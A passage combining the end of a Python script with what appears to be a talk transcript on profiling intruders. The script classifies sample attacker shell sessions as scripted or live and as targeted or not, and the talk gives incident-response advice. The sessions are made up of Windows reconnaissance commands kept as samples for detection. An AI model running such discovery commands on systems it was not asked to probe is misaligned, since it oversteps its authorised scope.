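# Constructed session 2: slow, wandering discovery with a typo, no clear target.
SESSION_B = r"""
2000.0 771 whoami
2041.0 771 systeminfo
2098.0 771 dir c:\users
2150.0 771 dir "c:\Documents and Settings"
2230.0 771 net view
2300.0 771 ping 10.0.0.1
2390.0 771 dir c:\temq^Hp
"""
# Constructed session 3: perfectly typed, metronomic pacing, i.e. a script.
SESSION_C = r"""
3000.0 902 whoami
3000.2 902 ipconfig /all
3000.4 902 net view
3000.6 902 netstat -an
3000.8 902 systeminfo
"""


@dataclass
class Profile:
    commands: int
    duration_s: float
    backspaces: int
    discovery_ratio: float
    transfer_commands: int
    hosts_touched: list
    likely_live: bool
    likely_targeted: bool


def apply_backspaces(typed: str) -> str:
    """Reconstruct what the shell actually received from the raw keystrokes."""
    out = []
    i = 0
    while i < len(typed):
        if typed.startswith("^H", i):
            if out:
                out.pop()
            i += 2
        else:
            out.append(typed[i])
            i += 1
    return "".join(out)


def parse(capture: str):
    events = []
    for line in capture.strip().splitlines():
        ts, pid, cmd = line.split(maxsplit=2)
        events.append((float(ts), int(pid), cmd))
    return events


def profile(capture: str) -> Profile:
    events = parse(capture)
    times = [t for t, _, _ in events]
    raw = [c for _, _, c in events]
    backspaces = sum(c.count("^H") for c in raw)
    clean = [apply_backspaces(c) for c in raw]
    low = [c.lower() for c in clean]
    disc = sum(any(c.startswith(p) for p in DISCOVERY) for c in low)
    xfer = sum(any(c.startswith(p) for p in TRANSFER) for c in low)
    hosts = []
    for c in clean:
        for m in HOST_RE.finditer(c):
            h = m.group(1) or m.group(2)
            if h not in hosts:
                hosts.append(h)
    gaps = [b - a for a, b in zip(times, times[1:])] or [0.0]
    median_gap = statistics.median(gaps)
    spread = statistics.pstdev(gaps) if len(gaps) > 1 else 0.0
    # Assumed heuristics: a live human makes typos and paces irregularly; a script types
    # perfectly at near-constant intervals.
    live = backspaces > 0 or spread > 0.5 * max(median_gap, 0.1)
    # Assumed heuristic: a targeted session does little discovery and names its hosts.
    targeted = disc / max(len(low), 1) < 0.35 and len(hosts) > 0
    return Profile(len(events), times[-1] - times[0] if times else 0.0, backspaces,
                   disc / max(len(low), 1), xfer, hosts, live, targeted)


if __name__ == "__main__":
    for name, s in (("A", SESSION_A), ("B", SESSION_B), ("C", SESSION_C)):
        print(name, profile(s))
```

Session A profiles as live and targeted (three backspaces, two discovery commands out of seven, a named file server and an external address), session B as live but not targeted (every command is discovery), and session C as neither, which is the scripted-versus-live split the talk draws from the typos alone.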
If you build a profile, or an incident report with a profile, of every incident that occurs, you can easily, one day, correlate across other events. Okay, so these five right here may have been the same group or same person, and sort of correlating that and helping the community better understand this one hacker group, how they behave and how they act. And use the lessons learned to add stronger policy, to add better signatures to your network, to implement better countermeasures at your weak points, at your soft spots.

Professional recommendations. Execution: you're definitely going to want photos. You can't decide to create a chain of custody if you already performed any kind of analysis steps on any of your production assets that were hit. Think before you act, please. If you're working on prosecuting an intrusion, get your lawyer involved, your corporate attorney. Always describe every detail possible, in as much depth as you can. You never know when it'll be important. You never know, when you're doing your analysis, when you're writing down a detail, you get to some other systems and it may pop up like, oh, yeah, that was important over here. And then you actually put two and two together and you get five. Take more time to study non-cyber-based case studies. It helps you relate the methods, how they were able to find the criminal, how they were able to relate it back. Sometimes you can relate that to IT security. Document everything. In short, attempt to better understand your threats on your network. What may actually be of value to anyone that wants to do you harm? Define your assets and valuables. You can do a whole risk management, risk assessment of your network. Study non-cyber-based cases, like I mentioned, and increase your ability to correlate more events across your network.
You never know if these two client-side hits, these emails, phishing emails, if they were both going to the same entity, the same organization. Document everything, because it can all lead back. When you study more non-cyber-based case studies, cyber crimes, cyber criminals, there's a ton of them on the internet that are published now, because there's enough of us that have been caught. Serial murderers, habitual offenders: there's all kinds of data sources on the internet that you can learn from, you can research, and find out some usual, habitual methods that these guys fall prey to. And they help provide understanding of the resources they may use. When you start looking at an attacker, start looking at the tools they may be using against you, you start better understanding how they're getting in, what they're doing, and that helps you understand what you need to do to keep them out and what you need to buy. Keep up to date on the latest security trends. Maintain an active record of your environment. Be aware of your network behavior. Know your network, people. I'm not saying that none of you do, but I have consulted with two groups who have no idea where this system is. The host name? I don't know, I think it's on the fifth floor, and it's not even in that city. People who don't know that there's a daily cron job that runs an rsync to another database in another site. "I didn't know that happened. I didn't know that was something going on." Just please know your network. That'll help you reduce a lot of problems.

I added this last night, some of it, so I wanted to be able to give you awesome information to walk away with and do some reading. This is just some of the books that I have. Cyber Adversary Characterization is really the only good cyber adversary characterization book out there. It's a lot of fluff. It's a lot like the Microsoft Press from about 8, 10 years ago, the beginning of some processes that you can use. Then the criminal sciences books.
I always talk to lawyers. I talk to law enforcement types. If you're in that type of world, you can reach over and knock on their door or give them a call and say, hey, I want to learn more about this type of criminal sciences kind of study. Where should I go to learn? They can recommend you go to some certain places. Honeynet.org. Very, very good resource for criminal sciences, behavioral profiling, offender profiling. Very good resource. Wikipedia, of course. It has several dozen links on each page. Dartmouth University. They have a lot of good stuff too. Yeah, here we go. I'll close this off with some famous dead guy quotes. You can't go anywhere without those these days, right? The first one's very applicable today. I think most of us who are on the defense side, and I think some of us here, are really close to the second one as well. All right.